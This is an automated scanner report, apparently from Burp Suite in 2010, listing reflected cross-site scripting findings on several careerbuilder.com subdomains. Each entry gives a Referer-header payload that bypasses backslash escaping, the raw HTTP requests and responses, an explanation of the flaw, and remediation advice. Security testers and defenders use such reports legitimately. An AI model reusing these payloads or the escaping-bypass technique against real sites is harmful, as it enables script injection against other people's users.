X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=588ed3a3eebd48419950da291a0383c2-343070951-R9-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650D324AD14344277ED63E6781CC905D350A303A6132AE0CBF923142E49567A6DB226732C2A4EF40C28; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:11 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:11 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL9
Date: Sun, 14 Nov 2010 22:29:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 60f15\\';alert(1)//c9c3d8aec71'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfccf\'%3balert(1)//9972b559a7f was submitted in the Referer HTTP header. This input was echoed as dfccf\\';alert(1)//9972b559a7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /mf.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh043 HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dfccf\'%3balert(1)//9972b559a7f
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186474
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=21df41c5afa04de9ac04dff709cb2d3e-343071075-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650301ED01A93EF6559ED7ACAFEC8518CD1A9AB47289EC5881D3AA44E4265EED81F9B3327CC9B792055; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:31:15 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:46:15 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:31:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - dfccf\\';alert(1)//9972b559a7f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a713\'%3balert(1)//b6db130f670 was submitted in the Referer HTTP header. This input was echoed as 1a713\\';alert(1)//b6db130f670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mhf48aa HTTP/1.1
Host: mobile.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a713\'%3balert(1)//b6db130f670
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10195
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=44ffd6fd30b5426294f50f347da3ea77-343074508-wv-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6501E74DD28BB2FDB86C7DE8DDCD088A38DE5495471E11E6080678C00B6CD9DA9D7691FE84FF856E38E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:28:28 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR32
Date: Sun, 14 Nov 2010 23:28:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> CB Mob ...[SNIP]... er='mobile'; s_cb.eVar8='mobile.careerbuilder.com/mobile/default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1a713\\';alert(1)//b6db130f670'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b672d\'%3balert(1)//d2889a1bdcb was submitted in the Referer HTTP header. This input was echoed as b672d\\';alert(1)//d2889a1bdcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: mobile.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b672d\'%3balert(1)//d2889a1bdcb
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10195
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=ad0e098b90d04d38bdc5cbc3f02c23ca-343074478-wr-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6500A0F5D4F325594E4B7B56963AD6EE6F549E5CC1E6AB077ADEA07FC19A20D2AF73C46F21CFED20949; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:27:57 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 23:27:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> CB Mob ...[SNIP]... er='mobile'; s_cb.eVar8='mobile.careerbuilder.com/mobile/default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - b672d\\';alert(1)//d2889a1bdcb'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39b7f\'%3balert(1)//fd1e68bc403 was submitted in the Referer HTTP header. This input was echoed as 39b7f\\';alert(1)//fd1e68bc403 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /np.ic/Florida_Miami/ HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=39b7f\'%3balert(1)//fd1e68bc403
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 178511
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=d193d2da2f994068ae657613801ae0a8-343071124-w3-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650FB3E98C5C6ACE11D9685489390208AED573FA9BEA306C08C8D484265D82B21A041C676380FDD7F8C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:03 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:04 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR3
Date: Sun, 14 Nov 2010 22:32:03 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 39b7f\\';alert(1)//fd1e68bc403'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 894b3\'%3balert(1)//7ba9f980d81 was submitted in the Referer HTTP header. This input was echoed as 894b3\\';alert(1)//7ba9f980d81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /np.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh044 HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=894b3\'%3balert(1)//7ba9f980d81
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 178283
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=d1473c69403a49ec8ebf9e0ea519a1f2-343071265-w7-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65003EC1B87CBB6BA70922E8656A0D1888FB8AC077BB762524C6F01FCDC17C1566B91C57542DB6721A1; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:25 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:49:25 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR7
Date: Sun, 14 Nov 2010 22:34:25 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 894b3\\';alert(1)//7ba9f980d81'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50314\'%3balert(1)//8bb9d4c20a0 was submitted in the Referer HTTP header. This input was echoed as 50314\\';alert(1)//8bb9d4c20a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /rt.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh045 HTTP/1.1
Host: retail.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50314\'%3balert(1)//8bb9d4c20a0
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182773
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=ed904496b065448f8628756e1866a37f-343071293-w6-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6506E1BE139EC4AF2E0A61386AA8E839B797A307B76F70FE5FB45A9E55A0222E60B8DB9FFE65A24E159; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:52 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:49:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sun, 14 Nov 2010 22:34:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 50314\\';alert(1)//8bb9d4c20a0'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eeff\'%3balert(1)//b625734020e was submitted in the Referer HTTP header. This input was echoed as 6eeff\\';alert(1)//b625734020e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /rt.ic/Florida_Miami/ HTTP/1.1
Host: retail.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6eeff\'%3balert(1)//b625734020e
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182862
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=dc792b97acfe4885a90b55d0f9c81eae-343071152-w0-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650A06ECD1A2FFEDF6B55BA2F2D7B10B8B764652DC3C40E1672059F9833873516344A0AB7257C561BD4; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:31 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:32 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR10
Date: Sun, 14 Nov 2010 22:32:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6eeff\\';alert(1)//b625734020e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a1b3\'%3balert(1)//35ad406e06b was submitted in the Referer HTTP header. This input was echoed as 5a1b3\\';alert(1)//35ad406e06b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /sm.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh046 HTTP/1.1
Host: sales-marketing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5a1b3\'%3balert(1)//35ad406e06b
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 185161
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=969fc5e9d56b46f2ab1affc80cf3c931-343071308-wo-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650949AF606F12902D971680E2256E03A6D1DC28E63FEEF26AA0BF55E551F7266D494F439889C4F5AF9; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:08 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:50:08 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 22:35:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 5a1b3\\';alert(1)//35ad406e06b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27a8f\'%3balert(1)//6e670ded9a4 was submitted in the Referer HTTP header. This input was echoed as 27a8f\\';alert(1)//6e670ded9a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /sm.ic/Florida_Miami/ HTTP/1.1
Host: sales-marketing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27a8f\'%3balert(1)//6e670ded9a4
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 185266
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=e65ed342f27d4238af6d8621f0503b2c-343071157-wd-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65061E70695D1D1345551E477D9E9B188738F617418ADB3368BC5C74550A70AA3BF5FB06EFA92CB48E3; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:37 GMT; path=/; HttpOnly
